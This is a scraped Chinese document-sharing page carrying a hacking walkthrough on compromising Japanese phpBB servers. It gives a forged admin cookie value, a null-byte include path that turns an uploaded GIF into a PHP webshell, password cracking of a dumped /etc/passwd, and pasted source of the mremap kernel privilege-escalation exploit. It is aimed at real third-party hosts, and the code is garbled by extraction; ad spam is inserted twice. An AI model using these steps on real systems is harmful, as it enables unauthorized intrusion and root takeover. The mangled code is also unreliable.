




版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、通过PHPBB拿日本linux主机系统权限 文/KYO 王智磊最近公司不是很忙,我和我同学(也是同事)对LINUX产生了极大的兴趣。于是都在虚拟机上装了red hat 9.0,基本操作熟悉了以后总感觉还是找个肉鸡好玩些,并且决定玩就要玩日本,大家都知道日本的WEB服务器最喜欢用*nix,个人感觉日本70%的网站都是用*nix+apache的构建方式。*这里插播个广告,黑友们请无视,只是为朋友的网站能被搜索引擎收录,多加点流量。返利网,淘你喜欢,淘宝返利,淘宝返现购物。*当然那些溢出apache的0day的程序我们没有,所以决定还是先从WEBSHELL下手,然后想办法提升权限。怎么找目标呢?首先
2、可以考虑CGI漏洞,从这个地方入手肯定能找到很多口子,不过这个以后再说,今天就谈一下大家都熟悉的PHPBB这个论坛,因为最近暴出了不少关于这个论坛的漏洞,另外这个论坛应用也蛮广泛的。打开www.google.co.jp输入关键字powered by phpbb,出来很多,随便找到一个版本比较低的PHPBB论坛。地址为http:/www.*.org,可以看到是phpbb2.0.3,这样可以利用修改COOKIES进入后台。打开iecv.exe,编辑COOKIES,把vaule替换为a:2:s:11:autologinid;b:1;s:6:userid;s:1:2;然后保存以后,关掉网页,重新再打开
3、一次,就变成管理员了。点击下面的Go to Administration Panel 链接进入后台。现在我想大家关心的是怎么通过后台拿到一个WEBSHELL了。具体原理在这里我就不多说了,就是利用把%00进行url编码一次:%25%30%30,include成功被截断,那么我们可以利用./来调用文件。我们把phpshell代码保存为gif或其他图片格式,在通过论坛上传 然后利用构造 install_to 而被 include() 调用并执行。好了现在是找到上传的地方,进后台一看,发现他的个人头像上传是关闭的。把上面3个设置全部改为yes,头像大小默认为80 x80,这个最好也改大点,省的一会传
4、图片的时候因为太大不能传还要回来改。OK,准备工作做完后,来到首页,打开http:/www.*.org/forum/profile.php?mode=editprofile可以看到传图片的地方了,把我们精心构造的含有的图片test.gif做为头像传上去,并查看源代码记下来gif的路径。因为这个论坛比较特殊,那个图片目录不可写,我改到tmp目录,所以我这里路径为././././././././././tmp/dcf91e05431c8366e40a9.gif.然后我们用http:/www.*.org/ forum/admin/admin_styles.php?mode=addnew&instal
5、l_to=././././././././././tmp/dcf91e05431c8366e40a9.gif%25%30%30 &sid=d915682df5d0e9bfbd2b621828a0c0e5 在lanker的一句话马客户端提交就可以得到一个可爱的webshell了。*这里插播个广告,黑友们请无视,只是为朋友的网站能被搜索引擎收录,多加点流量。返利网,淘你喜欢,淘宝返利,淘宝返现购物。*在这里要说一下的是最后的那个sid的值是你进后台页面的地址的后面的那个值复制过来的。好了,这个后门实在不是很好看,再传一个大一点的马吧。这个马看起来就舒服多了,并且执行命令也方便了。 现在有了webs
6、hell,执行命令id, uid=33(www-data) gid=33(www-data) groups=33(www-data), 看来权限是很小,接下来就是提升权限。先查看系统的版本,执行命令uname a Linux pod-133 2.4.22-1-686 #6 Sat Oct 4 14:09:08 EST 2003 i686 GNU/Linux。正好手上有一个这个版本的溢出程序,可以试一下。预先得知他开了22端口,现在的关键是能找到一个弱口令的帐号通过SSH登陆上去上传我的代码,编译然后执行。执行命令cat etc/passwd把执行命令的结果复制下来,然后分离用户,用流光跑了3个
7、小时终于得到一个FTP的弱口令帐户。打开SecureCRT,通过SSH登陆上去。当然权限仍然很低。进来以后用wget传我的溢出代码。/* * *mremap missing do_munmap return check kernel exploit * *gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte *./mremap_pte suid shell * *Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * *THIS PROGRAM
8、IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED AS IS *AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION *WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */#include #include #include #include #include #include #include #include #include #include #include #include #
9、define str(s) #s#define xstr(s) str(s)/this is for standard kernels with 3/1 split#define STARTADDR0x40000000#define PGD_SIZE(PAGE_SIZE * 1024)#define VICTIM(STARTADDR + PGD_SIZE)#define MMAP_BASE(STARTADDR + 3*PGD_SIZE)#define DSIGNALSIGCHLD#define CLONEFL(DSIGNAL|CLONE_VFORK|CLONE_VM)#define MREMA
10、P_MAYMOVE( (1UL) 0 )#define MREMAP_FIXED( (1UL) 1 )#define _NR_sys_mremap_NR_mremap/how many ld.so pages? this is the .text section length (like from cat /proc/self/maps) in pages#define LINKERPAGES0x14/suid victimstatic char *suid=/bin/ping;/shell to startstatic char *launch=/bin/bash;_syscall5(ulo
11、ng, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len, unsigned long flags, unsigned long new_addr);static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;static int i, pid=0;static char *e
12、nv2, *argv2;static ulong ret;/code to appear inside the suid imagestatic void suid_code(void)_asm_(callcallmen/setresuid(0, 0, 0), setresgid(0, 0, 0)jumpme:xorl%ebx, %ebxnxorl%ecx, %ecxnxorl%edx, %edxnxorl%eax, %eaxnmov$xstr(_NR_setresuid), %alnint$0x80nmov$xstr(_NR_setresgid), %alnint$0x80n/execve(
13、launch)popl%ebxnandl$0xfffff000, %ebxnxorl%eax, %eaxnpushl%eaxnmovl%esp, %edxnpushl%ebxnmovl%esp, %ecxnmov$xstr(_NR_execve), %alnint$0x80n/exitxorl%eax, %eaxnmov$xstr(_NR_exit), %alnint$0x80ncallme:jmpjumpmen);static int suid_code_end(int v)return v+1;static inline void get_esp(void)_asm_(movl%esp,
14、%eaxnandl$0xfffff000, %eaxnmovl%eax, %0n: : m(old_esp);static inline void cloneme(void)_asm_(pushanmovl $(xstr(CLONEFL), %ebxnmovl %esp, %ecxnmovl $xstr(_NR_clone), %eaxnint $0x80nmovl %eax, %0npopan: : m(pid);static inline void my_execve(void)_asm_(movl %1, %ebxnmovl %2, %ecxnmovl %3, %edxnmovl $xs
15、tr(_NR_execve), %eaxnint $0x80n: =a(ret): m(suid), m(argv), m(env);static inline void pte_populate(unsigned addr)unsigned r;char *ptr;memset(void*)addr, 0x90, PAGE_SIZE);r = (unsigned)suid_code_end) - (unsigned)suid_code);ptr = (void*) (addr + PAGE_SIZE);ptr -= r+1;memcpy(ptr, suid_code, r);memcpy(v
16、oid*)addr, launch, strlen(launch)+1);/hit VMA limit & populate PTEsstatic void exhaust(void)/mmap PTE donort = mmap(void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);if(MAP_FAILED=t)goto failed;/prepare shell code pagesfor(i=2; i65520 )printf(r
17、 MMAP #%d 0x%.8x - 0x%.8lx, cnt, base,base+PAGE_SIZE); fflush(stdout);base += PAGE_SIZE;prot = PROT_EXEC;cnt+;/move PTEs & populate page table cacheret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);if(-1=ret)goto failed;munmap(void*)MMAP_BASE,
18、old_esp-MMAP_BASE);t = mmap(void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);if(MAP_FAILED=t)goto failed;*t = *(unsigned *)old_esp);munmap(void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE);printf(n+ Successnn); fflush(stdout);return;fai
19、led:printf(n- Failedn); fflush(stdout);_exit(0);static inline void check_kver(void)static struct utsname un;int a=0, b=0, c=0, v=0, e=0, n;uname(&un);n=sscanf(un.release, %d.%d.%d, &a, &b, &c);if(n!=3 | a!=2) printf(n- invalid kernel version stringn);_exit(0);if(b=2) if(c=25)v=1;else if(b=3) if(c18 & c24)v=0, e=0;elsev=1, e=0;else if(b=5 & c=75)v=1, e=1;else if(b=6 & c1) suid=av1;if(ac2) launch=av2;argv0 = suid;get_esp();/mmap & clon
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 提高CPMM解题能力的试题及答案
- 国际物流师环境因素考题详情试题及答案
- 货物分拣与配送管理试题与答案
- 发现CPMM学习资源的试题及答案
- 2024年CPMM应试方案:试题与答案
- 如何高效复习CPMM的试题及答案
- 国际物流与供应链管理的试题及答案
- 适用于CPMM的学习方法与试题及答案
- 供考生参考的CPSM考试试题答案
- 2024年CPSM考试全书试题及答案
- 语文-湖南省长郡二十校联盟2025届新高考教学教研联盟高三第一次联考(长郡二十校一联)试题和答案
- 2025年康复科多学科协作计划
- 医学临床“三基”训练护士分册(第五版)考试题(附答案)
- 数据结构:第2章-线性表
- 《焊接知识培训》课件
- 2024年全国高考甲卷物理试题含答案解析
- 物流运输安全免责条款合同
- 综合与实践 白昼时长规律的探究说课稿 2024-2025学年人教版数学七年级下册
- 2024年合肥职业技术学院高职单招职业技能测验历年参考题库(频考版)含答案解析
- 2024年北京顺义区卫生健康委员会所属事业单位招聘笔试真题
- 印刷行业安全培训
评论
0/150
提交评论